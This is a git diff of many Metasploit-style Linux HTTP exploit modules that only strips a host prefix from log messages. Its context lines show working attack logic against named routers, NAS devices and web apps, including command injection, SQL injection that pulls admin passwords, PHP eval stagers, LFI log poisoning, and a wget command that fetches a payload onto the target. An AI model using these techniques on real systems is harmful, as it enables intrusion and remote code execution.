< Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb index fc89dd0e39..df5eab20f3 100644 --- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb @@ -80,13 +80,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb index 1513892d77..5478e1f05c 100644 --- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb +++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb @@ -117,26 +117,26 @@ class Metasploit3 < Msf::Exploit::Remote @uri.path << "/" if @uri.path[-1, 1] != "/" peer = "#{rhost}:#{rport}" - print_status("#{peer} - Getting the sid and token...") + print_status("Getting the sid and token...") sid, token = get_sid_token if sid.nil? - print_error("#{peer} - Unable to retrieve a session ID") + print_error("Unable to retrieve a session ID") return elsif token.nil? - print_error("#{peer} - Unable to retrieve a token") + print_error("Unable to retrieve a token") return end user = datastore['USERNAME'] pass = datastore['PASSWORD'] - print_status("#{peer} - Attempt to login with \"#{user}:#{pass}\"") + print_status("Attempt to login with \"#{user}:#{pass}\"") success = login(sid, token) if not success - print_error("#{peer} - Unable to login") + print_error("Unable to login") return end - print_status("#{peer} - Sending malicious request...") + print_status("Sending malicious request...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(@uri.path, "admin/tools/export.php"), diff --git a/modules/exploits/linux/http/esva_exec.rb b/modules/exploits/linux/http/esva_exec.rb index de1a4d8942..86c03e5227 100644 --- a/modules/exploits/linux/http/esva_exec.rb +++ b/modules/exploits/linux/http/esva_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit peer = "#{rhost}:#{rport}" - print_status("#{peer} - Sending Command injection") + print_status("Sending Command injection") res = send_request_cgi({ 'method' => 'GET', 'uri' => "/cgi-bin/learn-msg.cgi", @@ -84,12 +84,12 @@ class Metasploit3 < Msf::Exploit::Remote # If the server doesn't return the default redirection, probably something is wrong if not res or res.code != 200 or res.body !~ /meta http-equiv="refresh" content="0;URL=\/learned.html"/ - print_error("#{peer} - Probably command not executed, aborting!") + print_error("Probably command not executed, aborting!") return end - print_good("#{peer} - Command executed successfully") - print_status("#{peer} - Output: \n#{res.body.split("Learned tokens")[0]}") + print_good("Command executed successfully") + print_status("Output: \n#{res.body.split("Learned tokens")[0]}") end end diff --git a/modules/exploits/linux/http/fritzbox_echo_exec.rb b/modules/exploits/linux/http/fritzbox_echo_exec.rb index acb764be06..da57034a85 100644 --- a/modules/exploits/linux/http/fritzbox_echo_exec.rb +++ b/modules/exploits/linux/http/fritzbox_echo_exec.rb @@ -101,13 +101,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( flavor: :echo, linemax: 92 diff --git a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb index a7ca3d7d9b..f3a9285a0b 100644 --- a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb +++ b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb @@ -115,14 +115,14 @@ class Metasploit3 < Msf::Exploit::Remote def exploit peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + print_status("Attempting to login...") @josso_id = get_josso_token if @josso_id.nil? fail_with(Failure::NoAccess, "#{peer} - Unable to retrieve a JOSSO session ID") end - print_good("#{peer} - Authentication successful") + print_good("Authentication successful") - print_status("#{peer} - Sending malicious request...") + print_status("Sending malicious request...") execute_command(payload.encoded) end end diff --git a/modules/exploits/linux/http/kloxo_sqli.rb b/modules/exploits/linux/http/kloxo_sqli.rb index e3c2a9b4a8..d1911a1fd9 100644 --- a/modules/exploits/linux/http/kloxo_sqli.rb +++ b/modules/exploits/linux/http/kloxo_sqli.rb @@ -111,13 +111,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited") unless check == Exploit::CheckCode::Vulnerable - print_status("#{peer} - Recovering the admin password with SQLi...") + print_status("Recovering the admin password with SQLi...") loot = base64_password fail_with(Failure::Unknown, "#{peer} - Failed to exploit the SQLi...") if loot.nil? @password = Rex::Text.decode_base64(loot) - print_good("#{peer} - Password recovered: #{@password}") + print_good("Password recovered: #{@password}") - print_status("#{peer} - Logging into the Control Panel...") + print_status("Logging into the Control Panel...") @session = send_login fail_with(Failure::NoAccess, "#{peer} - Login with admin/#{@password} failed...") if @session.nil? @@ -130,11 +130,11 @@ class Metasploit3 < Msf::Exploit::Remote attempt_time: DateTime.now ) - print_status("#{peer} - Retrieving the server name...") + print_status("Retrieving the server name...") @server = server_info fail_with(Failure::NoAccess, "#{peer} - Login with admin/#{Rex::Text.decode_base64(base64_password)} failed...") if @server.nil? - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") send_command(payload.encoded) end @@ -252,14 +252,14 @@ class Metasploit3 < Msf::Exploit::Remote loot = '' until exploit_sqli(i, "\x00") - vprint_status("#{peer} - Bruteforcing position #{i}") + vprint_status("Bruteforcing position #{i}") c = brute_force_char(i) if c.nil? return nil else loot << c end - vprint_status("#{peer} - Found: #{loot}") + vprint_status("Found: #{loot}") i = i + 1 end @@ -297,7 +297,7 @@ class Metasploit3 < Msf::Exploit::Remote return false end - vprint_warning("#{peer} - Unknown fingerprint while exploiting SQLi... be careful") + vprint_warning("Unknown fingerprint while exploiting SQLi... be careful") false end diff --git a/modules/exploits/linux/http/linksys_themoon_exec.rb b/modules/exploits/linux/http/linksys_themoon_exec.rb index 1831de7645..16b771a9f4 100644 --- a/modules/exploits/linux/http/linksys_themoon_exec.rb +++ b/modules/exploits/linux/http/linksys_themoon_exec.rb @@ -109,13 +109,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager({:flavor => :echo}) end diff --git a/modules/exploits/linux/http/multi_ncc_ping_exec.rb b/modules/exploits/linux/http/multi_ncc_ping_exec.rb index 67a93ba046..41bace5c42 100644 --- a/modules/exploits/linux/http/multi_ncc_ping_exec.rb +++ b/modules/exploits/linux/http/multi_ncc_ping_exec.rb @@ -111,13 +111,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") @pl = generate_payload_exe @payload_url = '' @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{upload_path}" - print_status("#{peer} - Downloading the payload to the target machine...") + print_status("Downloading the payload to the target machine...") res = exec_command(cmd) if res && [200].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/ @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote def chmod_payload cmd = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}" - print_status("#{peer} - chmod the payload...") + print_status("chmod the payload...") res = exec_command(cmd, 1) unless res @@ -169,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote def exec_payload cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf) - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") res = exec_command(cmd, 1) unless res diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb index bd9cf31035..f2b62feae3 100644 --- a/modules/exploits/linux/http/mutiny_frontend_upload.rb +++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb @@ -143,9 +143,9 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to login") + print_status("Trying to login") if login - print_good("#{peer} - Login successful") + print_good("Login successful") else fail_with(Failure::NoAccess, "#{peer} - Login failed, review USERNAME and PASSWORD options") end @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_native - print_status("#{peer} - Uploading executable Payload file") + print_status("Uploading executable Payload file") elf = payload.encoded_exe elf_location = "/tmp" elf_filename = "#{rand_text_alpha_lower(8)}.elf" @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") jsp = jsp_execute_command("#{elf_location}/#{elf_filename}") jsp_location = "/usr/jakarta/tomcat/webapps/ROOT/m" jsp_filename = "#{rand_text_alpha_lower(8)}.jsp" @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri(target_uri.path, "m", jsp_filename), diff --git a/modules/exploits/linux/http/netgear_readynas_exec.rb b/modules/exploits/linux/http/netgear_readynas_exec.rb index 9fce52a1a5..2927c2bb20 100644 --- a/modules/exploits/linux/http/netgear_readynas_exec.rb +++ b/modules/exploits/linux/http/netgear_readynas_exec.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit my_payload = "#{rand_text_numeric(1)});use MIME::Base64;system(decode_base64(\"#{Rex::Text.encode_base64(payload.encoded)}\")" - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_payload(my_payload) end diff --git a/modules/exploits/linux/http/nginx_chunked_size.rb b/modules/exploits/linux/http/nginx_chunked_size.rb index be5ae4c9c3..14e5d58793 100644 --- a/modules/exploits/linux/http/nginx_chunked_size.rb +++ b/modules/exploits/linux/http/nginx_chunked_size.rb @@ -85,7 +85,7 @@ class Metasploit4 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end @@ -213,16 +213,16 @@ class Metasploit4 < Msf::Exploit::Remote else if not datastore['CANARY'] == 0xffffffff - print_status("#{peer} - Using 0x%08x as stack canary" % datastore['CANARY']) + print_status("Using 0x%08x as stack canary" % datastore['CANARY']) canary = datastore['CANARY'] else - print_status("#{peer} - Searching for stack canary") + print_status("Searching for stack canary") canary = find_canary if canary.nil? || canary == 0x00000000 fail_with(Failure::Unknown, "#{peer} - Unable to find stack canary") else - print_good("#{peer} - Canary found: 0x%08x\n" % canary) + print_good("Canary found: 0x%08x\n" % canary) end end @@ -246,11 +246,11 @@ class Metasploit4 < Msf::Exploit::Remote # First byte of the canary is already known canary = "\x00" - print_status("#{peer} - Assuming byte 0 0x%02x" % 0x00) + print_status("Assuming byte 0 0x%02x" % 0x00) # We are going to bruteforce the next 3 bytes one at a time 3.times do |c| - print_status("#{peer} - Bruteforcing byte #{c + 1}") + print_status("Bruteforcing byte #{c + 1}") 0.upto(255) do |i| data = random_chunk_size(1024) @@ -259,7 +259,7 @@ class Metasploit4 < Msf::Exploit::Remote data << i.chr unless send_request_fixed(data).nil? - print_good("#{peer} - Byte #{c + 1} found: 0x%02x" % i) + print_good("Byte #{c + 1} found: 0x%02x" % i) canary << i.chr break end diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb index 782cd0a2e1..d3bc972546 100644 --- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb +++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # retrieve software version from login page - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = send_request_cgi({ 'uri' => '/' @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = Rex::Text.uri_encode("&#{payload.raw}&") # send payload - print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + print_status("Sending payload (#{payload.raw.length} bytes)") begin res = send_request_cgi({ 'uri' => '/admin/system.html', @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 and res.body =~ /System : Network Setup<\/title>/ - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/ fail_with(Failure::NoAccess, 'Authentication failed') else diff --git a/modules/exploits/linux/http/pandora_fms_exec.rb b/modules/exploits/linux/http/pandora_fms_exec.rb index 110c774531..8d08d715ac 100644 --- a/modules/exploits/linux/http/pandora_fms_exec.rb +++ b/modules/exploits/linux/http/pandora_fms_exec.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(client) - print_status("#{peer} - Trying to escalate privileges to root") + print_status("Trying to escalate privileges to root") [ # ignore SIGHUP so the server doesn't kill our root shell "trap '' HUP", @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect Pandora FMS Remote Gateway") + print_status("Trying to detect Pandora FMS Remote Gateway") res = send_request_cgi({ 'method' => 'GET', @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway") - print_good("#{peer} - Pandora FMS Remote Gateway Detected!") + print_good("Pandora FMS Remote Gateway Detected!") return Exploit::CheckCode::Detected end @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending payload") + print_status("Sending payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "/anyterm-module"), diff --git a/modules/exploits/linux/http/pandora_fms_sqli.rb b/modules/exploits/linux/http/pandora_fms_sqli.rb index 070c50dd90..9c17429b93 100644 --- a/modules/exploits/linux/http/pandora_fms_sqli.rb +++ b/modules/exploits/linux/http/pandora_fms_sqli.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote def check - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") version = nil res = send_request_cgi({ @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end unless version.nil? - vprint_status("#{peer} - Pandora FMS #{version} found") + vprint_status("Pandora FMS #{version} found") if Gem::Version.new(version) <= Gem::Version.new('5.0SP2') return Exploit::CheckCode::Appears end @@ -120,13 +120,13 @@ class Metasploit3 < Msf::Exploit::Remote password = inject_sql(sqli, clue) if password && password.length != 0 - print_status("#{peer} - Extracted auto login password (#{password})") + print_status("Extracted auto login password (#{password})") else - print_error("#{peer} - No auto login password has been defined!") + print_error("No auto login password has been defined!") return false end - print_status("#{peer} - Attempting to authenticate using (admin:#{password})") + print_status("Attempting to authenticate using (admin:#{password})") # Attempt to login using login hash password res = send_request_cgi({ 'method' => 'POST', @@ -146,17 +146,17 @@ class Metasploit3 < Msf::Exploit::Remote def auth_succeeded?(res) if res && res.code == 200 && res.body.include?('Welcome to Pandora FMS') - print_status("#{peer} - Successfully authenticated!") - print_status("#{peer} - Attempting to retrieve session cookie") + print_status("Successfully authenticated!") + print_status("Attempting to retrieve session cookie") @cookie = res.get_cookies if @cookie.include?('PHPSESSID') - print_status("#{peer} - Successfully retrieved session cookie: #{@cookie}") + print_status("Successfully retrieved session cookie: #{@cookie}") return true else - print_error("#{peer} - Error retrieving cookie!") + print_error("Error retrieving cookie!") end else - print_error("#{peer} - Authentication failed!") + print_error("Authentication failed!") end false @@ -177,9 +177,9 @@ class Metasploit3 < Msf::Exploit::Remote password = inject_sql(sqli, clue) if password && password.length != 0 - print_good("#{peer} - Extracted admin password hash, unsalted md5 - [ #{password} ]") + print_good("Extracted admin password hash, unsalted md5 - [ #{password} ]") else - print_error("#{peer} - Unable to extract password hash!") + print_error("Unable to extract password hash!") return false end end @@ -204,7 +204,7 @@ class Metasploit3 < Msf::Exploit::Remote if match result = match[1] else - print_error("#{peer} - SQL injection failed") + print_error("SQL injection failed") end end result @@ -229,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote if form =~ /(?<=name="hash" type="hidden" value=")(.*?)(?=" \/>)/ hash = $1 else - print_error("#{peer} - Could not extract hash from response!") + print_error("Could not extract hash from response!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -237,7 +237,7 @@ class Metasploit3 < Msf::Exploit::Remote if form =~ /(?<=name="hash2" type="hidden" value=")(.*?)(?=" \/>)/ hash2 = $1 else - print_error("#{peer} - Could not extract hash2 from response!") + print_error("Could not extract hash2 from response!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -245,11 +245,11 @@ class Metasploit3 < Msf::Exploit::Remote if form =~ /(?<=name="real_directory" type="hidden" value=")(.*?)(" \/>)/ real_directory = $1 else - print_error("#{peer} - Could not extract real_directory from response!") + print_error("Could not extract real_directory from response!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end else - print_error("#{peer} - Could not identify upload form!") + print_error("Could not identify upload form!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -266,7 +266,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part("#{hash2}", nil, nil, 'form-data; name="hash2"') post_data.add_part('1', nil, nil, 'form-data; name="upload_file_or_zip"') - print_status("#{peer} - Attempting to upload payload #{@payload_name}...") + print_status("Attempting to upload payload #{@payload_name}...") res = send_request_cgi({ 'method' => 'POST', 'cookie' => @cookie, @@ -281,7 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.include?("Upload correct") register_file_for_cleanup(@payload_name) - print_status("#{peer} - Successfully uploaded payload") + print_status("Successfully uploaded payload") else fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -290,24 +290,24 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # First try to authenticate using default or user-supplied credentials - print_status("#{peer} - Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})") + print_status("Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})") auth = authenticate unless auth - print_status("#{peer} - Attempting to extract auto login hash via SQLi") + print_status("Attempting to extract auto login hash via SQLi") auth = login_hash end unless auth - print_status("#{peer} - Attempting to extract admin password hash with SQLi") + print_status("Attempting to extract admin password hash with SQLi") extract fail_with(Failure::NoAccess, "#{peer} - Unable to perform remote code execution!") end - print_status("#{peer} - Uploading PHP payload...") + print_status("Uploading PHP payload...") upload - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'images', @payload_name), diff --git a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb index 8806f177b8..3cf0aafc86 100644 --- a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb @@ -82,13 +82,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, diff --git a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb index 95759912b2..56c7f7425a 100644 --- a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb +++ b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb @@ -109,7 +109,7 @@ class Metasploit4 < Msf::Exploit::Remote # Step 1 - Establish a session with the target which will give us a PHP object we can # work with. begin - print_status("#{peer} - Establishing session with target ...") + print_status("Establishing session with target ...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri), 'method' => 'GET', @@ -129,13 +129,13 @@ class Metasploit4 < Msf::Exploit::Remote # Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly # then update it so that it's an admin session before re-encrypting - print_status("#{peer} - Upgrading session to administrator ...") + print_status("Upgrading session to administrator ...") php_object = decode_cookie(cookie_value) - vprint_status("#{peer} - PHP Object: #{php_object}") + vprint_status("PHP Object: #{php_object}") admin_php_object = set_string(php_object, 'is_admin', 'yes') admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT']) - vprint_status("#{peer} - Admin PHP object: #{admin_php_object}") + vprint_status("Admin PHP object: #{admin_php_object}") admin_cookie_value = encode_cookie(admin_php_object) @@ -146,7 +146,7 @@ class Metasploit4 < Msf::Exploit::Remote config_time = ::Time.now.to_i begin - print_status("#{peer} - Extracting existing host configuration ...") + print_status("Extracting existing host configuration ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'), 'method' => 'GET', @@ -173,8 +173,8 @@ class Metasploit4 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.") end - print_good("#{peer} - Host configuration extracted.") - vprint_status("#{peer} - Host configuration: #{host_config}") + print_good("Host configuration extracted.") + vprint_status("Host configuration: #{host_config}") # Step 4 - replace the host device description with a custom payload that can # be used for LFI. We have to keep the payload small because of size limitations @@ -191,7 +191,7 @@ class Metasploit4 < Msf::Exploit::Remote installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));" stager = Rex::Text.encode_base64(installer) stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>") - vprint_status("#{peer} - Stager: #{stager}") + vprint_status("Stager: #{stager}") # Butcher the XML directly rather than attempting to use REXML. The target XML # parser is way to simple/flaky to deal with the proper stuff that REXML @@ -203,7 +203,7 @@ class Metasploit4 < Msf::Exploit::Remote vprint_status(xml_payload) # Step 5 - set the host description to the stager so that it is written to disk - print_status("#{peer} - Uploading stager ...") + print_status("Uploading stager ...") begin res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), @@ -227,10 +227,10 @@ class Metasploit4 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).") end - print_good("#{peer} - Stager uploaded.") + print_good("Stager uploaded.") # Step 6 - Invoke the stage, passing in a self-deleting php script body. - print_status("#{peer} - Executing stager ...") + print_status("Executing stager ...") payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00") payload_cookie_value = encode_cookie(payload_php_object) self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>" @@ -250,20 +250,20 @@ class Metasploit4 < Msf::Exploit::Remote ) if res && res.code == 200 - print_good("#{peer} - Stager execution succeeded, payload ready for execution.") + print_good("Stager execution succeeded, payload ready for execution.") else - print_error("#{peer} - Stager execution failed (invalid result).") + print_error("Stager execution failed (invalid result).") errored = true end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - print_error("#{peer} - Stager execution failed (unable to establish connection).") + print_error("Stager execution failed (unable to establish connection).") errored = true end # Step 7 - try to restore the previous configuration, allowing exceptions # to bubble up given that we're at the end. This step is important because # we don't want to leave a trail of junk on disk at the end. - print_status("#{peer} - Restoring host config ...") + print_status("Restoring host config ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 'method' => 'POST', @@ -281,7 +281,7 @@ class Metasploit4 < Msf::Exploit::Remote # Step 8 - invoke the installed payload, but only if all went to plan. unless errored - print_status("#{peer} - Executing payload at #{normalize_uri(target_uri, payload_file)} ...") + print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, payload_file), 'method' => 'GET', @@ -325,7 +325,7 @@ class Metasploit4 < Msf::Exploit::Remote cookie_value = xor(block, datastore['XORKEY']) cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value)) - vprint_status("#{peer} - Cookie value: #{cookie_value}") + vprint_status("Cookie value: #{cookie_value}") cookie_value end diff --git a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb index 38434f957a..234cf47a2d 100644 --- a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb +++ b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit buffer = self.send(target[:callback]) - print_status("#{peer} - Sending exploit...") + print_status("Sending exploit...") send_close_window_request(buffer, payload.encoded) end diff --git a/modules/exploits/linux/http/symantec_web_gateway_exec.rb b/modules/exploits/linux/http/symantec_web_gateway_exec.rb index f3e0af32f5..a98731bc11 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_exec.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = "subnet=" post_data << "\";" + payload.raw + ";#" - print_status("#{peer} - Sending Command injection") + print_status("Sending Command injection") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'spywall/ipchange.php'), @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote # If the server doesn't return the default redirection, probably # something is wrong if not res or res.code != 302 or res.headers['Location'] !~ /SW\/admin_config.php/ - print_error("#{peer} - Probably command not executed, aborting!") + print_error("Probably command not executed, aborting!") return end diff --git a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb index 5eef56db31..6a0538c640 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part(after_filename, "application/octet-stream", nil, "form-data; name=\"after_filename\"") post_data.add_part("<?php #{payload.encoded} ?>", "image/gif", nil, "form-data; name=\"new_image\"; filename=\"#{payload_name}\"") - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "spywall/blocked_file.php"), @@ -104,11 +104,11 @@ class Metasploit3 < Msf::Exploit::Remote # of the default file, we assume we uploaded the malicious # file successfully if not res or res.code != 200 or res.body !~ /temp.php/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb index ca0376af14..b2f4258902 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote php = %Q|<?php #{payload.encoded} ?>| # Inject PHP to log - print_status("#{peer} - Injecting PHP to log...") + print_status("Injecting PHP to log...") res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{php}" @@ -92,13 +92,13 @@ class Metasploit3 < Msf::Exploit::Remote # Use the directory traversal to load the PHP code # access_log takes a long time to retrieve - print_status("#{peer} - Loading PHP code..") + print_status("Loading PHP code..") send_request_raw({ 'method' => 'GET', 'uri' => '/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log' }) - print_status("#{peer} - Waiting for a session, may take some time...") + print_status("Waiting for a session, may take some time...") select(nil, nil, nil, 1) diff --git a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb index 9cfd6f0a9a..6a331e2b35 100644 --- a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb +++ b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb 